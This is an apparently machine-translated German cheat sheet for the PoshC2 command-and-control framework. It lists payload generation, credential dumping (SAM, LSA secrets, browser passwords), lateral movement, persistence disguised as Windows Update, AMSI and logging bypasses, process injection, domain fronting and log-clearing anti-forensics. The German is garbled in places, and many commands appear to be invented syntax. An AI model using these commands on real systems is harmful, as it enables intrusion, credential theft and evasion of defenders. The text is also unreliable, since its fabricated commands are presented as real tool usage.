Zum Inhalt

PoshC2 Framework Cheat Sheet

generieren

Überblick

PoshC2 ist ein von Nettitude entwickeltes Proxy-Aware C2-Framework für rote Teaming- und Post-Exploitation-Aktivitäten. Es verfügt über PowerShell-Ausbeutungsfunktionen, seitliche Bewegungswerkzeuge und umfassende Proxy-Unterstützung für den Betrieb in eingeschränkten Netzwerkumgebungen.

ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.

Installation

Ubuntu/Debian Installation

```bash

Update system

sudo apt update && sudo apt upgrade -y

Install dependencies

sudo apt install curl python3 python3-pip python3-dev git build-essential

Clone PoshC2

git clone https://github.com/nettitude/PoshC2.git cd PoshC2

Install PoshC2

sudo ./Install.sh

Alternative pip installation

pip3 install poshc2 ```_

Docker Installation

```bash

Pull PoshC2 Docker image

docker pull nettitude/poshc2

Run PoshC2 in Docker

docker run -it -p 443:443 -p 80:80 nettitude/poshc2

Run with persistent data

docker run -it -v /opt/poshc2:/opt/PoshC2_Project nettitude/poshc2 ```_

Manuelle Installation

```bash

Install Python dependencies

pip3 install -r requirements.txt

Install additional tools

sudo apt install mingw-w64 mono-mcs

Set up database

python3 -c "from poshc2.server.database.DBUtil import *; initializedb()" ```_

Basisnutzung

Starten von PoshC2 Server

```bash

Start PoshC2 server

poshc2 --start

Start with custom configuration

poshc2 --start --config /path/to/config.yml

Start with specific project

poshc2 --start --project MyProject ```_

Neues Projekt erstellen

```bash

Create new project

poshc2 --new-project ProjectName

List projects

poshc2 --list-projects

Switch project

poshc2 --project ProjectName ```_

Befehlsnummer

Serververwaltung

| | Command | Description | | | --- | --- | | | help | Display help menu | | | | show-urls | Show payload URLs | | | | list-implants | List active implants | | | | implant-handler | Enter implant handler | | | | quit | Exit PoshC2 | |

Implant Handler Befehle

| | Command | Description | | | --- | --- | | | help | Show implant commands | | | | back | Return to main menu | | | | list-implants | List all implants | | | | use <implant-id> | Select implant | | | | kill <implant-id> | Kill implant | | | | remove-implant <implant-id> | Remove implant from database | |

Implant Interaction

| | Command | Description | | | --- | --- | | | help | Show available commands | | | | shell <command> | Execute shell command | | | | upload-file <local> <remote> | Upload file | | | | download-file <remote> | Download file | | | | screenshot | Take screenshot | | | | get-system | Attempt privilege escalation | |

Nutzlasterzeugung

PowerShell Payloads

```bash

Generate PowerShell payload

poshc2 --gen-payload powershell

Generate encoded PowerShell

poshc2 --gen-payload powershell --encoded

Generate PowerShell with proxy

poshc2 --gen-payload powershell --proxy http://proxy:8080 ```_

Ausführbare Payloads

```bash

Generate Windows executable

poshc2 --gen-payload exe

Generate DLL payload

poshc2 --gen-payload dll

Generate service executable

poshc2 --gen-payload service-exe ```_

Web Payloads

```bash

Generate HTA payload

poshc2 --gen-payload hta

Generate macro payload

poshc2 --gen-payload macro

Generate JavaScript payload

poshc2 --gen-payload js ```_

Linux Payloads

```bash

Generate Linux Python payload

poshc2 --gen-payload py

Generate Linux shell payload

poshc2 --gen-payload sh

Generate Linux ELF payload

poshc2 --gen-payload elf ```_

Proxy Konfiguration

HTTP Proxy Support

```bash

Configure HTTP proxy

set-proxy http://proxy.company.com:8080

Configure authenticated proxy

set-proxy http://username:password@proxy.company.com:8080

Configure SOCKS proxy

set-proxy socks5://proxy.company.com:1080 ```_

Proxy-Kettenkonfiguration

```bash

Multiple proxy configuration

set-proxy-chain http://proxy1:8080,socks5://proxy2:1080

Proxy with authentication

set-proxy-chain http://user:pass@proxy1:8080,http://proxy2:3128 ```_

Proxy-Testing

```bash

Test proxy connectivity

test-proxy http://proxy.company.com:8080

Test proxy authentication

test-proxy http://username:password@proxy.company.com:8080 ```_

Post-Exploitationsbefehle

Systeminformationen

```bash

Get system information

get-computerinfo

Get current user

whoami

Get domain information

get-domain

Get local users

get-localuser

Get local groups

get-localgroup ```_

Credential Harvesting

```bash

Dump SAM database

hashdump

Dump LSA secrets

lsa-secrets

Dump cached credentials

cachedump

Extract browser passwords

get-browserdata

Dump WiFi passwords

get-wifipasswords ```_

Active Directory Enumeration

```bash

Get domain controllers

get-domaincontroller

Get domain users

get-domainuser

Get domain groups

get-domaingroup

Get domain computers

get-domaincomputer

Get domain admins

get-domainadmin ```_

Spätere Bewegung

```bash

WMI execution

invoke-wmiexec -target 192.168.1.10 -command "whoami"

PSExec execution

invoke-psexec -target 192.168.1.10 -command "whoami"

SMB execution

invoke-smbexec -target 192.168.1.10 -command "whoami"

DCOM execution

invoke-dcomexec -target 192.168.1.10 -command "whoami" ```_

Persistenz

```bash

Registry persistence

new-persistence -method registry -key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"

Scheduled task persistence

new-persistence -method scheduledtask -taskname "WindowsUpdate"

Service persistence

new-persistence -method service -servicename "WindowsUpdateService"

WMI persistence

new-persistence -method wmi -eventname "ProcessStart" ```_

Erweiterte Funktionen

PowerShell Module

```bash

Load PowerShell module

loadmodule /path/to/module.ps1

Import PowerView

loadmodule PowerView

Import Invoke-Mimikatz

loadmodule Invoke-Mimikatz

Import PowerUp

loadmodule PowerUp ```_

. Ausführung der NET-Montage

```bash

Execute .NET assembly

run-exe /path/to/assembly.exe arguments

Execute in memory

run-exe-inmemory /path/to/assembly.exe arguments

Reflective DLL loading

invoke-reflectivedllinjection /path/to/dll.dll ```_

Prozessinjektion

```bash

Inject into process

inject-shellcode -processid 1234 -shellcode

Process hollowing

invoke-processhollowing -target notepad.exe -payload /path/to/payload.exe

DLL injection

invoke-dllinjection -processid 1234 -dllpath /path/to/dll.dll ```_

Netzwerkaktivitäten

```bash

Port scanning

invoke-portscan -hosts 192.168.1.0/24 -ports 22,80,443,3389

Network discovery

invoke-networkscan -subnet 192.168.1.0/24

SMB enumeration

invoke-smbenum -target 192.168.1.10

Share enumeration

invoke-shareenum -target 192.168.1.10 ```_

Evasion Techniken

AMSI Bypass

```bash

AMSI bypass

amsi-bypass

Custom AMSI bypass

amsi-bypass -method custom

Reflection-based bypass

amsi-bypass -method reflection ```_

ETW Bypass

```bash

ETW bypass

etw-bypass

Disable ETW logging

disable-etw

Patch ETW functions

patch-etw ```_

PowerShell Logging Bypass

```bash

Disable PowerShell logging

disable-pslogging

Bypass script block logging

bypass-scriptblocklogging

Disable module logging

disable-modulelogging ```_

Obfuskation

```bash

Obfuscate PowerShell command

invoke-obfuscation -command "Get-Process"

String obfuscation

obfuscate-string "sensitive string"

Variable obfuscation

obfuscate-variables ```_

Pivoting und Tunneling

SOCKEN Proxy

```bash

Start SOCKS proxy

start-socksproxy -port 1080

Stop SOCKS proxy

stop-socksproxy

List proxy connections

list-socksproxy ```_

Port Forwarding

```bash

Local port forward

portforward -localport 8080 -remotehost 192.168.2.10 -remoteport 80

Reverse port forward

portforward -reverse -localport 9090 -remotehost 127.0.0.1 -remoteport 22

Stop port forward

stop-portforward -id 1 ```_

Beacon Chaining

```bash

Create beacon chain

new-beacon -parent -child

List beacon chains

list-beacons

Remove beacon chain

remove-beacon -id ```_

Operationelle Sicherheit

Kommunikationssicherheit

```bash

Use HTTPS communications

set-comms https

Custom User-Agent

set-useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

Custom headers

set-headers "X-Forwarded-For: 192.168.1.100"

Domain fronting

set-domainfront cdn.example.com ```_

Sicherheit am Arbeitsplatz

```bash

Encrypt payloads

encrypt-payload -key "encryption-key"

Sign payloads

sign-payload -cert /path/to/cert.pfx

Obfuscate payloads

obfuscate-payload -method xor ```_

Anti-Forensik

```bash

Clear event logs

clear-eventlogs

Timestomp files

timestomp -file /path/to/file -time "01/01/2020 12:00:00"

Secure delete

sdelete -file /path/to/file

Clear tracks

clear-tracks ```_

Fehlerbehebung

Verbindungsprobleme

```bash

Check implant connectivity

test-connectivity

Verify proxy settings

show-proxy

Test DNS resolution

test-dns google.com

Check firewall rules

get-firewallrules ```_

Ausgabe von Payload

```bash

Regenerate payloads

regenerate-payloads

Test payload execution

test-payload /path/to/payload.exe

Check AV detection

test-av /path/to/payload.exe ```_

Leistungsfragen

```bash

Adjust beacon interval

set-beacon-time 30

Optimize jitter

set-jitter 0.2

Reduce payload size

compress-payload ```_

Datenbankprobleme

```bash

Repair database

repair-database

Backup database

backup-database /path/to/backup

Restore database

restore-database /path/to/backup ```_

Konfiguration

Serverkonfiguration

```yaml

config.yml

PayloadCommsHost: "https://c2.example.com" PayloadCommsPort: "443" DomainFrontHeader: "cdn.example.com" UserAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" Referrer: "https://google.com" ServerHeader: "Apache/2.4.41" HTTPResponse: "404" ```_

Proxy Konfiguration

```yaml

Proxy settings

ProxyURL: "http://proxy.company.com:8080" ProxyUser: "username" ProxyPass: "password" ProxyType: "http" # http, socks4, socks5 ```_

Ressourcen

--

*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von PoshC2 Framework. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie dieses Tool in jeder Umgebung verwenden. *